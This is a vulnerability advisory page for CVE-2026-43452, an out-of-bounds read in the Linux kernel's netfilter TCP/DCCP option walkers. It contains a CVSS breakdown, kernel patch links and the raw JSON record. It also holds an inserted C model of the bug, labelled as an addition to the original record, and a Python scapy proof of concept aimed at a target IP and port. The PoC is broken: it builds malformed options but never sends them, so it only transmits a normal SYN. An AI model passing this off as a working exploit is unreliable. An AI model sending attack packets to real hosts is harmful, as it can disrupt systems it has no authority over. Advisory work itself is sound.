Security Vulnerability Report
CVE-2026-43452 CVSS 8.2 HIGH

Published: 2026-05-08 15:16:58
Last Modified: 2026-05-11 08:16:15
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netfilter: x_tables: guard option walkers against 1-byte tail reads

When the last byte of options is a non-single-byte option kind, walkers that advance with i += op[i + 1] ? : 1 can read op[i + 1] past the end of the option area.

Add an explicit i == optlen - 1 check before dereferencing op[i + 1] in xt_tcpudp and xt_dccp option walkers.
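The walker pattern described above, modelled in userspace C as an added example (it is not the kernel's code and not part of the original record). The names walk_options and struct walk_result and both byte arrays are hypothetical, the out-of-range index is recorded rather than dereferenced, and the placement of the i == optlen - 1 check is an assumption based on the description.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* found: wanted kind seen; tail_read: walker asked for a byte at or past optlen. */
struct walk_result { bool found, tail_read; };

/* Hypothetical userspace model of an option walker (not kernel code).
 * guarded == false: every kind >= 2 is assumed to carry a length byte.
 * guarded == true : i == optlen - 1 is handled as a one-byte step first.
 * The out-of-range index is only recorded, never dereferenced. */
static struct walk_result walk_options(const uint8_t *op, size_t optlen,
                                       uint8_t wanted, bool guarded)
{
    struct walk_result r = { false, false };
    size_t i = 0;

    while (i < optlen) {
        if (op[i] == wanted) {
            r.found = true;
            return r;
        }
        if (op[i] < 2 || (guarded && i == optlen - 1)) {
            i++;                    /* EOL/NOP, or last byte: no length byte */
            continue;
        }
        if (i + 1 >= optlen) {      /* unguarded walker would read op[optlen] here */
            r.tail_read = true;
            return r;
        }
        i += op[i + 1] ? op[i + 1] : 1;   /* a zero length still advances */
    }
    return r;
}

/* Constructed sample: MSS option, then a lone multi-byte kind (8) as the last byte. */
static const uint8_t sample_tail[] = { 2, 4, 0x05, 0xb4, 8 };
/* Constructed sample: well-formed MSS, NOP, NOP, window scale. */
static const uint8_t sample_ok[] = { 2, 4, 0x05, 0xb4, 1, 1, 3, 3, 7 };

int main(void)
{
    struct walk_result a = walk_options(sample_tail, sizeof sample_tail, 5, false);
    struct walk_result b = walk_options(sample_tail, sizeof sample_tail, 5, true);
    struct walk_result c = walk_options(sample_ok, sizeof sample_ok, 3, true);
    printf("unguarded tail_read=%d guarded tail_read=%d ok found=%d\n",
           a.tail_read, b.tail_read, c.found);
    return 0;
}
```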

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (for the specific affected versions, refer to the Git patch links)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-43452: Linux Kernel netfilter OOB Read
# This script demonstrates how to craft a packet that may trigger the vulnerability.
# It requires scapy to be installed.
import sys

from scapy.all import IP, TCP, RandShort, send


def send_poc(target_ip, target_port):
    # Construct a TCP SYN packet
    # The vulnerability is triggered when the last byte of the options is > 1
    # and the walker tries to read the length byte (op[i+1]) which is out of bounds.
    # Standard options padding is usually NOP (1) or EOL (0). We need a byte > 1 at the boundary.
    # Note: Successfully triggering this depends on the stack processing order.

    # Craft raw options: filling the 40-byte option space mostly with NOPs,
    # but putting a specific byte at the end.
    # This is a simplified representation.
    custom_options = b"\x02\x04\x05\xB4"  # MSS
    custom_options += b"\x01" * 36  # Padding
    # Modify the last byte (index 39) to be a kind that expects a length (e.g., 0xFF)
    # However, Scapy handles padding automatically. We leverage the raw layer or specific option manipulation.

    ip = IP(dst=target_ip)
    tcp = TCP(sport=RandShort(), dport=target_port, flags="S", options=[('MSS', 1460)])

    # To strictly hit the boundary, one might need to manipulate the packet buffer directly
    # which is complex in high-level libs. This demonstrates the intent.

    print(f"[*] Sending PoC packet to {target_ip}:{target_port}")
    send(ip/tcp, verbose=0)
    print("[+] Packet sent.")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <target_ip> <target_port>")
        sys.exit(1)
    send_poc(sys.argv[1], int(sys.argv[2]))
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43452", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T15:16:57.900", "lastModified": "2026-05-11T08:16:14.683", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: x_tables: guard option walkers against 1-byte tail reads\n\nWhen the last byte of options is a non-single-byte option kind, walkers\nthat advance with i += op[i + 1] ? : 1 can read op[i + 1] past the end\nof the option area.\n\nAdd an explicit i == optlen - 1 check before dereferencing op[i + 1]\nin xt_tcpudp and xt_dccp option walkers."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "references": [{"url": "https://git.kernel.org/stable/c/5b18b8b35c7cded2d17b2b2604c9b0694ff48d1c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/9b94f0e42ed248eb31929da84ed9f5310d7ff540", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/ae1e1267650638136b84c23f2b31250f0ccb6823", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bc18551c6169eac5ed813778d3e3e484002dbbe5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c2a445367a496a3c25dbc940c10c8bd1cfd4c14a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c39f84e4be1be63fc60ca7141ea7b76edcea5907", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/cfe770220ac2dbd3e104c6b45094037455da81d4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/d04800323336eebf441d153f43234eac9b833d36", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}